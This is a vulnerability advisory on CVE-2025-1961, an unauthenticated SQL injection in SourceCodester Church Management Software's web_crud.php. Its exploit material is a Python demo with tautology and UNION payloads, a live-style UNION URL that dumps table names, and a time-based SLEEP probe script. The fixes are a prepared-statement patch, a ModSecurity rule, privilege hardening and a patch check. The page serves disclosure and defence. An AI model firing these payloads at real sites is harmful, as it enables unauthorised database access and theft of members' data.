SourceCodester Best Church Management Software, SQL Injection, CVE-2025-1961 (Critical)

How CVE-2025-1961 Works

The vulnerability exists in the `/admin/app/web_crud.php` file of SourceCodester Best Church Management Software 1.1. The value of the `encryption` request parameter is used when the script builds its SQL statement without being validated or parameterised, so quotes and SQL keywords inside the value are parsed by the database as part of the query rather than treated as data. The flaw can be exploited remotely without authentication, letting an attacker read, modify, or delete database contents. Because the affected functionality handles sensitive church management data, the issue is rated critical.
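To make the mechanism concrete, here is an added example that is not code from this page or from SourceCodester. Python with an in-memory SQLite database stands in for the PHP/MySQL stack of web_crud.php; the `data` and `users` tables, their rows and the shape of the SELECT are constructed for illustration, since the product's actual query is not reproduced here. The block contrasts string concatenation with a bound parameter, and shows why a UNION payload has to match the column count of the original query, which is what the padding columns in a UNION-based PoC are for.

```python
"""Illustrate the injection pattern behind CVE-2025-1961.

Python + sqlite3 stands in for PHP + MySQL; the schema, rows and the
SELECT shape are constructed for this example and are NOT taken from
web_crud.php, whose source is not reproduced on this page.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Throwaway in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE data  (id INTEGER, encryption TEXT, payload TEXT);
        INSERT INTO data  VALUES (1, 'aes', 'member-list-2024');
        INSERT INTO data  VALUES (2, 'rsa', 'donation-export');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, encryption: str) -> list:
    """The vulnerable pattern: the request value is spliced into the SQL text,
    so quotes and keywords inside it are parsed as SQL."""
    sql = f"SELECT id, encryption, payload FROM data WHERE encryption = '{encryption}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, encryption: str) -> list:
    """The fix: the value is bound as a parameter and can only ever be data."""
    sql = "SELECT id, encryption, payload FROM data WHERE encryption = ?"
    return conn.execute(sql, (encryption,)).fetchall()


def probe_column_count(conn: sqlite3.Connection, max_cols: int = 10):
    """Find how many columns the original SELECT returns, the way an attacker
    does before a UNION attack: a UNION of the wrong width is a SQL error,
    the right width is accepted. Returns None if nothing up to max_cols fits."""
    for n in range(1, max_cols + 1):
        payload = "x' UNION SELECT " + ", ".join(["NULL"] * n) + "-- -"
        try:
            vulnerable_lookup(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# Constructed payloads: a tautology and a UNION that reads another table.
TAUTOLOGY = "x' OR '1'='1"
UNION_USERS = "x' UNION SELECT id, username, password FROM users-- -"

if __name__ == "__main__":
    conn = make_db()
    print("legit  :", vulnerable_lookup(conn, "aes"))        # one row
    print("vuln   :", vulnerable_lookup(conn, TAUTOLOGY))    # every row
    print("columns:", probe_column_count(conn))              # 3
    print("vuln   :", vulnerable_lookup(conn, UNION_USERS))  # admin row leaks
    print("safe   :", safe_lookup(conn, UNION_USERS))        # []
```

The same payloads that dump `users` through `vulnerable_lookup` return nothing through `safe_lookup`, because the driver sends the bound value separately from the SQL text and the quote in it never reaches the parser. The `probe_column_count` step is the manual equivalent of the `1,2,3,...` padding seen in UNION-based PoCs: the attacker widens the UNION until the database stops rejecting it.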

DailyCVE Form

Platform: SourceCodester Church Management
Version: 1.1
Vulnerability: SQL Injection
Severity: Critical
Date: 04/29/2025

What Undercode Says:

-- Exploit PoC (sanitized for educational purposes)
-- The UNION branch must return as many columns as the original SELECT (10 in this payload; find the count with ORDER BY n or by probing with NULLs), and the payload must be URL-encoded when sent
/admin/app/web_crud.php?encryption=1' UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- -
# Vulnerability check script (time-based: MySQL SLEEP() only fires if the injected SQL executes)
import time
import requests
target = "http://target/admin/app/web_crud.php"
delay = 5
baseline = requests.get(target, params={"encryption": "1"}, timeout=30).elapsed.total_seconds()
payload = f"1' AND SLEEP({delay})-- -"
start = time.monotonic()
requests.get(target, params={"encryption": payload}, timeout=30)
if time.monotonic() - start >= baseline + delay:
    print("Vulnerable to SQLi")
// Secure coding fix: bind the value as a parameter instead of splicing it into the SQL string
$encryption = $_GET['encryption'] ?? '';
$stmt = $conn->prepare("SELECT * FROM data WHERE encryption = ?");
$stmt->bind_param("s", $encryption);
$stmt->execute();
$result = $stmt->get_result();
# WAF rule to block exploitation (ModSecurity)
SecRule ARGS_GET:encryption "@detectSQLi" "id:1001,phase:2,t:none,deny,status:403,msg:'SQLi Attempt'"
-- Database hardening: strip the web account down to read access, then add INSERT/UPDATE/DELETE only on the tables the application actually writes
REVOKE ALL PRIVILEGES ON church_db.* FROM 'webuser'@'%';
GRANT SELECT ON church_db.* TO 'webuser'@'%';
FLUSH PRIVILEGES;
# Automated patch verification (run from the application's web root; checks that the query is parameterised)
import subprocess
def check_patch(path="admin/app/web_crud.php"):
    result = subprocess.run(['grep', '-q', 'bind_param', path])
    return result.returncode == 0

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
